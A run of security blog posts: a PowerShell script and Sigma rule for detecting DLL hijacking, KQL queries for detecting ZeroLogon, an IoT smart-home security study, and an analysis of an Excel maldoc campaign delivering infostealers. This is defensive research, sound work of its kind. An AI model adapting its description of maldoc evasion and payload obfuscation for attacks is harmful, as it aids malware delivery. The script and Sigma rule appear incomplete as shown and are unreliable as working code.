$SYSMON_EXECUTABLE = "C:\Sysmon\Sysmon64.exe"
# Modify to point to the new config. (Will be overwritten by a run of the script!)
$CONFIG_FILE = "C:\Sysmon\config.xml"

Function Get-DLLs {
    # Using a HashSet to avoid having to filter for duplicates
	$dlls = New-Object System.Collections.Generic.HashSet[String]
    try {
        # Retrieve all Sysmon ImageLoaded events
	    $events = Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -FilterXPath "Event[System[(EventID=7)]]"
        # Extract the ImageLoaded from the events' Message fields
		$events.Message | ForEach-Object -Process {
			$loaded = (Select-String -InputObject $_ -Pattern "ImageLoaded: (.*)").Matches.Groups[1]
			$dlls.add($loaded) | Out-Null
	} catch {}
    # Sort before returning for consistent & managable output
	$dlls | Sort-Object

Function Export-SysmonConfig {
	$XMLHeader = @"
<Sysmon schemaversion=`"4.22`">
        <RuleGroup name="" groupRelation=`"or`">
            <ImageLoad onmatch=`"exclude`">

	$XMLTrailer = @"
    # To indent <ImageLoaded> for readability.
    $Offset = "                "
	Function Format-Exclusion {
		$dll = $dll.trim()
		$Offset + "<ImageLoaded condition=`"is`">$dll</ImageLoaded>`n"
	$XMLConfig = $XMLHeader
	$XMLConfig += $Offset + "<ImageLoaded condition=`"is`">$SYSMON_EXECUTABLE</ImageLoaded>`n"
	$XMLConfig += $Offset + "<ImageLoaded condition=`"begin with`">C:\Windows\System32\</ImageLoaded>`n"
	$XMLConfig += $Offset + "<ImageLoaded condition=`"begin with`">C:\Windows\SysWOW64\</ImageLoaded>`n"
	foreach ($dll in $dlls) {
		$XMLConfig += Format-Exclusion $dll
	$XMLConfig += $XMLTrailer

$dlls = Get-DLLs
Export-SysmonConfig $dlls | Tee-Object -FilePath $CONFIG_FILE
# Install the new config to lower the amount of logs generated.
Start-Process -FilePath $SYSMON_EXECUTABLE -ArgumentList @('-c', $CONFIG_FILE)

Be sure to only execute this on a known-good device, such as a freshly imaged laptop or a new VM:
If you use a potentially compromised device to generate this, there is a chance of excluding a malicious DLL that can then remain completely undetected in your environment.
You will need to run this every time a piece of software gets updated, as the loaded DLLs may change (new DLLs added, older DLLs no longer relevant) depending on the version of the software.

Note that to limit the amount of exclusions the config needs, the C:\Windows\System32\ and C:\Windows\SysWOW64\ directories are excluded in their entirety by the script.
You should set up a SIEM alert for Sysmon event ID 11 (FileCreate) if the TargetFileName starts with either of these directories.
A Sigma rule to detect this looks as follows:

title: DLL Created In Windows System Folder
id: ddc5624d-4127-4787-8cd9-e0943ebb10e8
status: experimental
description: |
  Detects new DLLs written to the Windows system folders.
  Can be used to gain persistence on a system by exploiting DLL hijacking vulnerabilities.
  - https://blog.nviso.eu/2020/10/06/mitre-attack-turned-purple-part-1-hijack-execution-flow
  - attack.t1574.001
  - attack.t1574.002
author: NVISO
date: 2020/10/05
  product: windows
  service: sysmon
    EventID: 11
      - 'C:\Windows\System32\'
      - 'C:\Windows\SysWOW64\'
    TargetFilename|endswith: '.dll'
  condition: selection
  - Driver installations
  - Some other software installations 
level: high

If your configuration is correct, you should not generate any Sysmon event ID 7 for legitimate DLLs and you can simply alert on any occurrence of the event as potentially malicious.
Any DLLs dropped in the excluded directories get flagged by the Sigma rule for proper coverage.
Even if your Sysmon config is not covering 100% of the legitimately loaded DLLs, the volume of generated events should be low enough to be able to be workable, and additional filtering can also be done using a SIEM or automated in a SOAR solution, for example.
With sufficient time, your detection capabilities for this technique should be tuned finely enough as to not generate many false positives.

Detection for this technique is obviously not cut-and-dry but it is possible to have very good coverage, provided your blue team gets a proper testing environment to improve their detection capabilities.

Prevention of this technique works very similar to detection:
One can write AppLocker policies to only allow known DLLs to load.
You can create a list of loaded DLLs by setting the policy to audit for several weeks and appending DLLs that were missed by the initial testing to the list of known-good ones before enforcing your policies.

The script and rule in this blogpost are available on our GitHub.


We hope that this blogpost has provided you with actionable information and has given you more insight into leveraging this technique and defending against it.
This was the first blogpost of a recurring series, we hope to see you again when we cover another ATT&CK technique in the near future!
From all of us at NVISO, stay safe!

About the author(s)

  • Jean-François Maes is a red teaming and social engineering expert working in the NVISO Cyber Resilience team. When he is not working, you can probably find Jean-François in the Gym or conducting research. Apart from his work with NVISO, he is also the creator of redteamer.tips, a website dedicated to help red teamers.
    He was also ranked #1 on the Belgian leaderboard of Hack The Box (a popular penetration testing platform).
    You can find Jean-François on LinkedIn and on Hack The Box.
  • Remco Hofman is an intrusion analyst in NVISO’s MDR team, always looking at improving the detection capabilities of the service. A few cups of properly brewed tea help him unwind after a long day’s work.
    You can find him on Twitter or LinkedIn.

Sentinel Query: Detect ZeroLogon (CVE-2020-1472)

17 September 2020 at 09:56

In August 2020 Microsoft patched the ZeroLogon vulnerability CVE-2020-1472. In summary, this vulnerability would allow an attacker with a foothold in your network to become a domain admin in a few clicks. The attacker only needs to establish a network connection towards the domain controller.

At NVISO we are supporting multiple clients with our MDR services, from that perspective our security experts analyzed the vulnerability and made queries for both Sentinel and threat hunting ( “Advanced Hunting”) to detect these types of activities in your network.

One requirement for running Sentinel queries is of course that you have on-boarded Active Directory event logs in your Sentinel log analytics workspace. This can be done by installing the Microsoft Monitoring Agent and forwarding the events towards said workspace.

In case these logs are available you can use the query below to detect activities related to the ZeroLogon vulnerability. Within this query, you have to replace DC1$ and DC2$ with the hostname(s) of your Domain Controllers.

//Search for anonymous logons, note this may produce FPs
| extend EvData = parse_xml(EventData)
| extend EventDetail = EvData.EventData.Data
| extend TargetUserName_CS = EventDetail.[1].["#text"], SubjectUserSid_CS = EventDetail.[4].["#text"], SubjectUserName_CS = EventDetail.[5].["#text"]
| project-away EvData, EventDetail
| where ((EventID == 4742)
    and (TargetUserName_CS in~ ("DC1$", "DC2$"))
     and ((SubjectUserName_CS contains "anonymous") or (SubjectUserSid_CS startswith "S-1-0") or (SubjectUserSid_CS startswith "S-1-5-7")))

The following image shows an example output of this query:

Should Sentinel not be available or the workspace has not been set up, we also include a KQL query (KUSTO rule) to be used in Advanced Hunting:

//Search for anonymous logons, note this may produce FPs
union DeviceLogonEvents, DeviceProcessEvents
| where AccountName in~ ("anonymous") or InitiatingProcessAccountName in~ ("anonymous") or
AccountSid startswith "S-1-0" or InitiatingProcessAccountSid startswith "S-1-0" or
AccountSid startswith "S-1-5-7" or InitiatingProcessAccountSid startswith "S-1-5-7"
//Remove FP
| where InitiatingProcessFileName != "ntoskrnl.exe"
| summarize by Timestamp, DeviceId, ReportId, DeviceName, AccountName, InitiatingProcessAccountName, AccountSid,
InitiatingProcessAccountSid, AccountDomain, InitiatingProcessFileName, ProcessCommandLine, AdditionalFields

Note that Anonymous Logons should be investigated either way. While this may be a False Positive such as the host itself, an Administrator or a Service account – it can also indicate malicious behavior. Use the Sentinel query below to investigate further.

//Once a detection from previous rule has hit, use the following to validate - if there IS a logon, investigate further. If not, it's likely a False Positive
| where ((EventID == 4624) and (TargetUserName =~ "DC1$"))
| distinct SubjectUserName

One way of investigating further whether this is a False Positive or not, is to leverage the Netlogon log, and correlating or comparing the output with results from running the queries above. This log is by default disabled, but can be enabled as follows on the affected Domain Controller (DC):  

  1. Execute the following commands in an elevated prompt:
    • Nltest /DBFlag:2080FFFF
    • net stop netlogon
    • net start netlogon
  2. The same can be achieved with (elevated) PowerShell:
    • Nltest /DBFlag:2080FFFF
    • Restart-Service Netlogon
  3. Investigate the log file that will be created. Note it may take a while to reproduce the event. The log file is found at: %windir%\debug\netlogon.log
  4. Correlate the event(s) from before in the Netlogon log. Once identified, you can disable Netlogon logging again by setting the DBFlag as 0x0.

The following query will assist in detecting whenever a vulnerable Netlogon secure channel connection is allowed – keep in mind however this will only work should you have already applied the patch:

//This query will work ONLY after the patch has been applied. It warrants further investigation.
| where EventID == 5829

On top of this we also wrote an additional KQL query to search for evidence – specifically, if someone has (intentionally or not) disabled Enforcement Mode.

//Netlogon enforcement explicitly disabled
union DeviceProcessEvents, DeviceRegistryEvents
| where RegistryKey contains "\\system\\currentcontrolset\\services\\netlogon\\parameters"
| where RegistryValueName == "FullSecureChannelProtection"
| where RegistryValueType == "Dword"
| where RegistryValueData == 0 or RegistryValueData == 0x00000000
| summarize by Timestamp, DeviceId, ReportId, DeviceName, RegistryKey, InitiatingProcessAccountName, InitiatingProcessFileName, ProcessCommandLine

Note that the KUSTO hunting queries can also be leveraged as a Detection Rule, which allows for proactive alerting.

In case you want additional details about the queries or Sentinel please do not hesitate to reach out! You can contact the blog authors or via filling in the contact form on our website https://www.nviso.eu.


Our research is based upon the following references


This blog post was created based on the collaborative effort of :

Smart Home Devices: assets or liabilities? – Part 1: Security

14 September 2020 at 11:12

This blog post is part of a series, keep an eye out for the following parts!

TL;DR – Smart home devices are everywhere, so I tested the base security measures implemented on fifteen devices on the European market. In this blog post, I share my experience throughout these assessments and my conclusions on the overall state of security of this fairly new industry. Spoiler alert: there’s a long road ahead of this industry to grow in maturity when it comes to security.

Great new toys, great new responsibilities

Increasingly often, we are surrounding ourselves with connected devices. Even those who are adamant about not having any “smart devices” in their homes usually happily switch on their smart TV at the end of a long day while they drop down on the sofa. According to market studies and economic forecasts, the market share of smart home devices has been steadily rising for quite some time now, and that is not expected to be changing anytime soon. Smart home environments are everywhere these days, and for the most part they make our lives a lot more convenient.

However, there is another side to the coin: just like the devices themselves, news coverage about security concerns surrounding these devices has been popping up weekly, if not daily. Crafty criminals are tricking smart voice assistants into opening garage doors, circumventing ‘smart’ alarms or might even be spying on people through their internet-connected camera. We’ve already taken a deep dive in the past into some smart alarms, which showed their security left a lot to be desired. This raises the question: how secure are these devices we introduce to our daily lives really? I’ve tried to find out exactly that.

File:HAL9000 I'm Sorry Dave Motivational Poster.jpg - Wikimedia Commons
The words none of us want to hear when we ask our smart assistant to unlock the front door.
(Image credit: Wikimedia Foundation)

Research methodology

To get an idea of the overall security of Smart Home devices on the European market, I selected fifteen devices, chosen in such a way that they represented as many different product categories, price ranges and brands as possible. Where possible, I made sure to get at least two devices of different price ranges and brands in each category to be able to compare them.

Devices of all kinds were chosen for the tests.
(Image credit: see “Reference” below)

Then, I subjected each device to a broad security assessment. Each assessment consisted of a series of tests that were based on ENISA’s “Baseline Security Recommendations for IoT”. Here, the goal was not to conduct a full in-depth assessment of each device, but to get an overview on whether each device implemented the baseline of security measures a customer could reasonably expect from an off-the-shelf smart home solution. In order to guarantee repeatability of the tests, I mostly relied on automated industry-standard testing tools, such as nmap, Wireshark, Burp Suite, and Nessus.

In my tests, I covered the following range of categories: Network Communications, Web Interfaces, Operating Systems & Services, and Mobile Applications.

Network Communications

Because (wireless) network communications make up a large part of the attack surface of Smart Home devices, I performed a network capture of the traffic of each device for an idle period of 24 hours.

Without even looking into the data itself, it’s already interesting to note the vast differences in the number of captured packets within this period, where smart voice assistants and cameras are the clear winners.

Why does a doorbell send that many packets?
(Image credit: see “Reference” below)

In the figure below, you can see the different protocols that these devices used.

Oh, and all of the devices used DNS of course!
(Image credit: see “Reference” below)

When we think about network security, the encryption of the data is the most obvious security control we can check. However, this proved to be not always easy: Wireshark will tell you if TLS is being used or not, but aside from that, how can we determine if a raw TCP or UDP data stream is encrypted or not? For this, I used two scripts written by my colleague, Didier Stevens: simple_tcp_stats and simple_udp_stats.

These scripts calculate the average Shannon Entropy in each data stream. Streams with a high entropy value are likely encrypted, whereas streams with a low entropy value will likely contain natural text or structured data. The results were surprising: when mapping the different entropy scores in some box plots, many devices had multiple data streams with low entropy values, indicating that data was likely not being encrypted.

  • Lower score means data is less likely to be encrypted.
  • Keep in mind (unencrypted) DNS was included in these graphs.
Anybody order some entropy boxplots?
(Image credit: see “Reference” below)

The above results indicate that while yes, some devices used state of the art, standardised, and most importantly secure network protocols, about half of them used something that was either not recognised by Wireshark (e.g. raw TLS/UDP streams) or has been proven to be insecure in the past (e.g. TLS 1.0). The results of the entropy testing are striking: not a single device wasn’t guilty of sending some data that was likely not encrypted: even those devices that encrypted the majority of their communications still sent DNS or sometimes NTP requests unencrypted over the network.

Web Interfaces

A lot of devices need some type of interface to interact with them. In most cases, that’s the mobile application accompanying the device. Sometimes, devices also support interactions via a web interface. Then, there are two options: a local interface, directly running on the device, or a cloud interface that runs on online servers maintained by the manufacturer. In the case of the latter, which made up most of the devices, doing in-depth testing was simply not possible due to legal limitations. However, one thing I could do was scan the cloud interface for SSL/TLS vulnerabilities with Qualys SSL Labs. I tested local interfaces by running an active scan in Burp Professional and performing a nikto scan.

On local interfaces, the most common serious flaw I found was the lack of encrypted communications: all of them ran over HTTP and sent credentials (as well as all other information, such as configuration data) in plaintext over the network. Quite a serious violation of secure web development practices for a really long time now.

Cloud interfaces were accessible via HTTPS, and all of them scored a B on the SSL Labs test because they all supported old TLS versions 1.0 and/or 1.1. While a B is not an inherently bad score, this indicates many vendors prioritise compatibility over security, as a higher score would be expected of those that want to deliver the best security to their customers.

All in all, it seems like developers adhered to the regular best practices when it came to cloud portals, but somehow forgot that local web interfaces also need the same care and protection as any other exposed service would have. It’s not because a device isn’t directly open for connections over the internet, that an attacker who gained access to the local network won’t try to gain a larger foothold by connecting to the devices within it.

Operating System & Services

I port scanned each device with nmap and ran some basic service discovery and vulnerability scans with Nessus Essentials. Sadly, I found that traditional scanning methods translate very poorly to these smart home devices: service discovery was very unreliable at best and plain wrong in most cases. Vulnerability scanning rarely yielded any interesting results besides some basic informational alerts. This is likely caused by the large amount of proprietary technologies or custom protocols that are being used by these devices.

What this concretely means is that there’s no straightforward, easy way to get an insight in the security of the devices. Gaining such knowledge would require tailored, targeted security assessments: a time consuming and difficult task, even for highly skilled professionals. Pretty discomforting, if you ask me.

Mobile Applications

As I mentioned earlier, users can often interact with their devices via web interfaces or a smartphone app. I performed static analysis on each of the corresponding android apps with MobSF (Mobile Security Framework). More specifically, I looked at:

  • the permissions requested by each app;
  • the known trackers embedded in the code;
  • domains that could be found in the code to get an indication of which and how many servers the app was calling out to.

I found that a lot of applications were asking for a disproportionally large number of permissions, sometimes even permissions an application arguably would not need to function properly. For example, what use does a smart light bulb app have for requesting permissions to record audio?

‘Dangerous’ permissions are any permissions the user needs to explicitly allow access for.
(Image credit: see “Reference” below)

I also noticed a significant number of mobile apps that included trackers. Most of them seemed to be for bug fixing and crash reporting, but others also included more intrusive tracking for advertising purposes.

Google Firebase Analytics and CrashLytics are likely included for crash reporting.
(Image credit: see “Reference” below)

The Verdict

So, based on all this information, what can we say about the security of the smart home devices currently available on the market? Well, for starters, in all the paragraphs above we can see there’s some good things, often followed by a ‘but’. Based on the fact that when we look at the bigger picture, devices that were properly secured on one front usually also seemed to do well in all the others, it seems to be quite a hit or miss when it comes to security. Vice versa, devices that were lacking certain security controls were usually insecure across the board. Most notably, in my results I clearly saw what security professionals already knew: security is a complete package. You simply can’t just cover one part and leave the other aspects of your product exposed. For products that came from manufacturers that understood this, I saw known to be secure network protocols, strong authentication options and user friendliness that made sure security was taken care of by default with little effort required from the consumer. The other products often had security as a mere afterthought: something that could be enabled if the user dug deep into the app menus, or maybe even not at all.

What can we do?

Now that we know it’s a hit or miss with these smart home devices, how can we make the right decisions in the store and make sure we don’t end up with one of the bad apples? Is it just a matter of luck, or can we steer the odds in our favour?

Luckily, there are a few things you can look out for; price is one of them, but – as we have already shown in these previous blog posts here and here  – should never be your only indicator. I found that brand recognition is an important factor in the level of attention the manufacturer will pay to security of their device. If a brand is well known and needs to uphold their good reputation to stay in business, they will also spend more time on fixing security flaws in the future, even after their product is already out for some time. And that brings me to the next point: automatic updates.

Even if you have a device that is secure today, if it’s never updated in the upcoming years it will eventually become vulnerable. Therefore, another good indication of security is the presence of updates. Ideally, automatic updates that are pushed to the device by the vendor without the need for user interaction, as we are probably all guilty of deferring updates out of convenience until it’s too late.

Afterthoughts and looking ahead

The overall security of devices on the market seems to be a hit or miss. Currently there are not many indicators consumers can look for when buying a device, but the combination of price, brand recognition and the presence of security updates can already give a general guideline on which device will be a good bet. If we want to get a clearer overview of the actual security of smart home IoT devices, an in-depth manual security assessment is needed because automated tools provide inaccurate or unsatisfying results.

Stay tuned for Part 2 of this series, in which I’ll be talking about smart home devices and privacy!

This research was conducted as part of the author’s thesis dissertation submitted to gain his Master of Science: Computer Science Engineering at KU Leuven and device purchases were funded by NVISO labs. The full paper is available on KU Leuven libraries.


[1] Bellemans Jonah. June 2020. The state of the market: A comparative study of IoT device security implementations. KU Leuven, Faculteit Ingenieurswetenschappen.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their Cyber Security Strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Epic Manchego – atypical maldoc delivery brings flurry of infostealers

1 September 2020 at 11:33

In July 2020, NVISO detected a set of malicious Excel documents, also known as “maldocs”, that deliver malware through VBA-activated spreadsheets. While the malicious VBA code and the dropped payloads were something we had seen before, it was the specific way in which the Excel documents themselves were created that caught our attention.

The creators of the malicious Excel documents used a technique that allows them to create macro-laden Excel workbooks, without actually using Microsoft Office. As a side effect of this particular way of working, the detection rate for these documents is typically lower than for standard maldocs.

This blog post provides an overview of how these malicious documents came to be. In addition, it briefly describes the observed payloads and finally closes with recommendations as well as indicators of compromise to help defend your organization from such attacks.

Key Findings (TL;DR)

  • The malicious Microsoft Office documents are created using the EPPlus software rather than Microsoft Office Excel, these documents may fly under the radar as it differs from a typical Excel document;
  • NVISO assesses with medium confidence that this campaign is delivered by a single threat actor based on the limited number of documents uploaded to services such as VirusTotal, and the similarities in payloads delivery throughout this campaign;
  • The payloads that have been observed up to the date of the release of this post, have been, for the most part, so called information stealers with the intention of harvesting passwords from browsers, email clients, etc.;
  • The payloads stemming from these documents have evolved only slightly in terms of obfuscation and masquerading. This is another indication of a single actor who is slowly evolving their technical prowess.


The analysis section below is divided in two parts and refers to a specific link in the infection chain.

Malicious document analysis

In an earlier blog post, we wrote about “VBA Purging”[1], which is a technique to remove compiled VBA code from VBA projects. We were interested to see if any malicious documents found in-the-wild were adopting this technique (it lowers the initial detection rate of antivirus products). This is how we stumbled upon a set of peculiar malicious documents.

At first, we thought they were created with Excel, and were then VBA purged. But closer examination leads us to believe that these documents are created with a .NET library that creates Office Open XML (OOXML) spreadsheets. As stated in our VBA Purging blog post, Office documents can also lack compiled VBA code when they are created with tools that are totally independent from Microsoft Office. EPPlus is such a tool. We are familiar with this .NET library, as we have been using it since a couple of years to create malicious documents (“maldocs”) for our red team and penetration testers.

When we noticed that the maldocs had no compiled code, and were also missing Office metadata, we quickly thought about EPPlus. This library also creates OOXML files without compiled VBA code and without Office metadata.

The OOXML file format is an Open Packaging Conventions (OPC) format: a ZIP container with mainly XML files, and possibly binary files (like pictures). It was first introduced by Microsoft with the release of Office 2007. OOXML spreadsheets use extension .xlsx and .xlsm (for spreadsheets with macros).

When a VBA project is created with EPPlus, it does not contain compiled VBA code. EPPlus has no methods to create compiled code: the algorithms to create compiled VBA code are proprietary to Microsoft.

The very first malicious document we detected was created on 22nd of June 2020, and since then 200+ malicious documents were found over a period of 2 months. The actor has increased their activity in the last weeks, as now we see more than 10 new malicious documents on some days.

Figure 1 – Unique maldocs observed per day

The maldocs discovered over the course of two months have many properties that are quite different from the properties of documents created with Microsoft Office. We believe this is the case because they are created with a tool independent from Microsoft Excel. Although we don’t have a copy of the exact tool used by the threat actor to create these malicious documents, the malicious documents created by this tool have many properties that convince us that they were created with the aforementioned EPPlus software.

Some of EPPlus’ properties include, but are not limited to:

  • Powerful and versatile library: not only can it create spreadsheets containing a VBA project, but that project can also be password protected and/or digitally signed. It does not rely on Microsoft Office. It can also run on Mono (cross platform, open-source .NET).
  • OOXML files created with EPPlus have some properties that distinguish them from OOXML files created with Excel. Here is an overview:
    • ZIP Date: every file included in a ZIP file has a timestamp (DOSDATE and DOSTIME field in the ZIPFILE record). For documents created (or edited) with Microsoft Office, this timestamp is always 1980-01-01 00:00:00 (0x0021 for DOSDATE and 0x0000 for DOSTIME). OOXML files created with EPPlus have a timestamp that corresponds to the creation time of the document. Usually, that timestamp is the same for all files inside the OOXML files, but due to execution delays, there can be a difference of 2 seconds between timestamp. 2 seconds is the resolution of the DOSTIME format.

Figure 2 – DOSTIME difference (left: EPPlus created file)

  • Extra ZIP records: a typical ZIP file is composed of ZIP file records (magic 50 4B 03 04) with metadata for the file, and the (compressed) file content. Then there are ZIP directory entries (magic 50 4B 01 02) followed by a ZIP end-of-directory record (magic 50 4B 05 06). Microsoft Office creates OOXML files containing these 3 ZIP record types. EPPlus creates OOXML files containing 4 ZIP records: it also includes a ZIP data description record (magic 50 4B 07 08) after each ZIP file record.

Figure 3 – Extra ZIP records (left: EPPlus created file)

  • Missing Office document metadata: an OOXML document created with Microsoft Office contains metadata (author, title, …). This metadata is stored inside XML files found inside the docProps folder. By default, documents created with EPPlus don’t have metadata: there is no docProps folder inside the ZIP container.

Figure 4 – Missing metadata (left: EPPlus created file)

  • VBA Purged: OOXML files with a VBA project created with Microsoft Office contain an OLE file (vbaProject.bin) with streams containing the compiled VBA code and the compressed VBA source code. Documents created with EPPlus do not contain compiled VBA code, only compressed VBA source code. This means that:
    • The module streams only contain compressed VBA code
    • There are no SRP streams (SRP streams contain implementation-specific and version-dependent compile code, theire name starts with __SRP_)
    • The _VBA_PROJECT stream does not contain compiled VBA code. In fact, the content of the _VBA_PROJECT stream is hardcoded in the EPPlus source code: it’s always CC 61 FF FF 00 00 00.

Figure 5 – Hardcoded stream content (left: EPPlus created file)

In addition to the above, we have also observed some properties of the VBA source code that hints at the use of a creation tool based on a library like EPPlus.

There are a couple of variants to the VBA source code used by the actor (some variants use PowerShell to download the payload, others use pure VBA code). But all these variants contain a call to a loader function with one argument, a string with the URL (either BASE64 or hexadecimal encoded). Like this (hexadecimal example):

Loader”68 74 74 70 …”

Do note that there is no space character between the function name and the argument: there is no space between Loader and ”68 74 74 70 …”.

This is an indication that the VBA code was not entered through the VBA EDI in Office: when you type a statement like this, without space character, the VBA EDI will automatically add a space character for you (even if you copy/paste the code). The absence of this space character divulges that this code was not entered through the VBA EDI, but likely via a library such as EPPlus.

To illustrate these differences in properties, we show examples with one of our internal tools (ExcelVBA) using the EPPlus library. We create a vba.xlsm file with the vba code in text file vba.txt using our tool ExcelVBA, and show some of its properties.:

Figure 6 – NVISO created XLSM file using the EPPlus library

Figure 7 – Running oledump.py reveals this document was created using the EPPlus library

Some of the malicious documents contain objects that clearly have been created with EPPlus, using some of the example code found on the EPPlus Wiki. We illustrate this with the following example (the first document in this campaign):

Filename: Scan Order List.xlsm
MD5: 8857fae198acd87f7581c7ef7227c34d
SHA256: 8a863b5f154e1ddba695453fdd0f5b83d9d555bae6cf377963c9009c9fa6c9be
File Size: 5.77 KB (5911 bytes)
Earliest Contents Modification: 2020-06-22 14:01:46

This document contains a drawing1.xml object (a rounded rectangle) with this name: name=”VBASampleRect”.

Figure 8 – zipdump of maldoc

Figure 9 – Selecting the drawing1.xml object reveals the name

This was created with sample code found on the EPPlus Wiki[2]:

Figure 10 – EPPlus sample code, clearly showing the similarities

Noteworthy is that all maldocs we observed have their VBA project protected with a password. It is interesting to note that the VBA code itself is not encoded/encrypted, it is stored in cleartext (although compressed) [3]. When a document with a password protected VBA project is opened, the VBA macros will execute without the password: the user does not need to provide the password. The password is only required to view the VBA project inside the VBA IDE (Integrated Development Environment):

Figure 11 – Password prompt for viewing the VBA project

We were not able to recover these passwords. We used John the Ripper with the rockyou.txt password list[4], and Hashcat with a small ASCII brute-force attack.

Although each malicious document is unique with its own VBA code, with more than 200 samples analyzed to date, we can generalize and abstract all this VBA code to just a handful of templates. The VBA code will either use PowerShell or ActiveX objects to download the payload. The different strings are encoded using either hexadecimal, BASE64 or XOR-encoding; or a combination of these encodings. A Yara rule to detect these maldocs is provided at the end of this blog post for identification and detection purposes.

Payload analysis

As mentioned in the previous section, via the malicious VBA code, a second-stage payload is downloaded from various websites. Each second-stage executable created by its respective malicious document acts as dropper for the final payload. In order to thwart detection mechanisms such as antivirus solutions, a variety of obfuscation techniques are leveraged which are however not advanced enough to hide the malicious intent.  The infrastructure used by the threat actor appears to mainly comprise compromised websites.

Popular antivirus solutions such as those listed on VirusTotal, shown in Figure 12, commonly identify the second-stage executables as “AgentTesla”. While leveraging VirusTotal for malware identification is not an ideal method, it does display how simple obfuscation can result in an incorrect classification. Throughout this analysis, we’ll explain how only few of these popular detections turned out to be accurate.

Figure 12: VirusTotal “AgentTesla” mis-identification.

The different obfuscation techniques we observed outline a pattern common to all second-stage executables of operation Epic Manchego. As can be observed in Figure 13, the second stage will dynamically load a decryption DLL. This DLL component then proceeds to extract additional settings and a third-stage payload before transferring the execution to the final payload, typically an information stealer.

Figure 13: Operation Epic Manchego final stage delivery mechanism.

Although the above obfuscation pattern is common to all samples, we have observed an evolution in its complexity as well as a wide variation in perhaps more opportunistic techniques.

  Early Variants Recent Variants
DLL Component Obfuscation Obfuscated base64 encoding Empty fixed-size structures
Final Payload Obfuscation Single-PNG encoding Multi-BMP dictionary encoding
Opportunistic Obfuscation Name randomisation Run-time method resolving, Goto flow-control, …

Table 1 – Variant comparison

A common factor of the operation’s second-stage samples is the usage of steganography to obfuscate their malicious intent. Figure 14 identifies a partial configuration used in recent variants where a dictionary of settings, including the final payload, is encoded into hundreds of images as part of the second-stage’s embedded resources.

Figure 14: Partial dictionary encoded in a BMP image

The image itself is part of the following second-stage sample which has the following properties:

Filename: crefgyu.exe
MD5: 7D71F885128A27C00C4D72BF488CD7CC
SHA256: C40FA887BE0159016F3AFD43A3BDEC6D11078E19974B60028B93DEF1C2F95726
File Size: 761 KB (779.776 bytes)
Compilation Timestamp: 2020-03-09 16:39:33

Noteworthy is the likelihood that the obfuscation process is not built by the threat actors themselves. A careful review of the second-stage steganography decoding routine uncovers how most samples mistakenly contain the final payload twice. In the following representation (Figure 15) of the loader’s configuration we can see that its payload is indeed duplicated. The complexity of the second- and third-stage payloads furthermore tend to suggest the operation involves different actors as the initial documents reflect a less experienced actor.

Throughout the multiple dictionary-based variants analyzed we furthermore noticed that, regardless of the final payload, similar keys were used as part of the settings. All dictionaries contained the final payload as “EpkVBztLXeSpKwe” while some, as seen in Figure 15, also contained the same value as “PXcli.0.XdHg”. This suggests a possible builder for payload delivery, which may be used by multiple actors.

Figure 15: Stage 2 decoded dictionary

Within the manually analyzed dataset of 30 distinct dictionary-based second stages, 19 unique final payloads were observed. From these, the “Azorult” stealer accounts for 50% of the variant’s delivery (Figure 16). Other payloads include “AgentTesla”, “Formbook”, “Matiex” and “njRat”, which are all well-documented already. Both “Azurult” and “njRAT” have a noticeable reusage rate.

Figure 16: Dictionary-based payload classification and (re-)usage of samples with trimmed hashes

Our analysis of droppers and respective payloads uncovered a common pattern in obfuscation routines. While opportunistic obfuscation methods may evolve, the delivered payloads remain part of a rather limited set of malware families.


A small number of the malicious documents we retrieved from VirusTotal were uploaded together with the phishing email itself. Analysis of these emails can shed some light on the potential targets of this actor. Due to the limited number of source emails retrieved, it was not possible to identify a clear pattern based on the victims. In the 6 emails we were able to retrieve, recipients were in the medical equipment sector, aluminium sector, facility management and a vendor for custom made press machines.

When looking into the sender domains, it appears most emails are sent from legitimate companies. Having used the “Have I Been Pwned”[5] service to confirm if any of the email addresses were known to be compromised, turned up with no results. This leaves us to wonder whether the threat actor was able to leverage these accounts during an earlier infection or whether a different party supplied them. Regardless of who compromised the accounts, it appears the threat actor primarily uses legitimate corporate email accounts to initiate the phishing campaign.

Looking at both sender and recipient, there doesn’t appear to be a pattern we can deduce to identify potential new targets. There does not seem to be a specific sector targeted nor are the sending domains affiliated with each other.

Both body (content) and subject of the emails relate to a more classic phishing scheme, for example, a request to initiate business for which the attachment provides the ‘details’. An overview of subjects observed can be seen below, note some subjects have been altered by the respective mail gateways:

  • Re: Quotation required/
  • Quote volume and weight for preferred
  • *****SPAM***** FW:Offer_10044885_[companyname]_2_09_2020.xlsx*
  • [SUSPECTED SPAM] Alternatives for Request*
  • Purchase Order Details
  • Quotation Request

Figure 17 – Sample phishing email

This method of enticing users to open the attachments is nothing new and does not provide a lot of additional information to pinpoint the campaign targeting any specific organisation or verticals.

However, leveraging public submissions of the maldocs through VirusTotal, we clustered over 200 documents, which allowed us to rank 27 countries by submission count without differentiating between uploads possibly performed through VPNs. As shown in Figure 18, areas such as the United States, Czech Republic, France, Germany, as well as China, account for the majority of targeted regions.

Figure 18 – Geographical distribution of VT submissions

When analysing the initial documents for targeted regions, we primarily identified English, Spanish, Chinese and Turkish language-based images.

Figure 19 – Maldoc content in Chinese, Turkish, Spanish and English respectively

Some images however contained an interesting detail: some of the document properties are in Cyrillic, and this regardless of the image’s primary language.

Although the Cyrillic Word settings were observed in multiple images, a new maldoc detected at time of writing this blog post piqued our interest, as it appears to be the first one to explicitly impersonate a healthcare sector member (“Ohiohealth Hardin Memorial Hospital”), as can be observed in Figure 20. Note also the settings as described above: СТРАНИЦА 1 ИЗ 1; which means page 1 of 1.

Figure 20 – Maldoc content impersonating “Ohiohealth Hardin Memorial Hospital” with Cyrillic Word settings

This Microsoft Excel document has the following details:

Filename: 새로운 주문 _2608.xlsm (Korean: New order _2608.xlsm)
MD5: 551b5dd7aff4ee07f98d11aac910e174
SHA256: 45cab564386a568a4569d66f6781c6d0b06a9561ae4ac362f0e76a8abfede7bb
File Size: 5.77 KB (5911 bytes)
Earliest Contents Modification: 2020-06-22 14:01:46

While the template from said hospital may have been simply discovered on the web and consequently used by the threat actor, this surprising change in modus operandi does appear to align with the actor’s constant evolution observed since the start of tracking.



Based on the analysis, NVISO assesses the following:

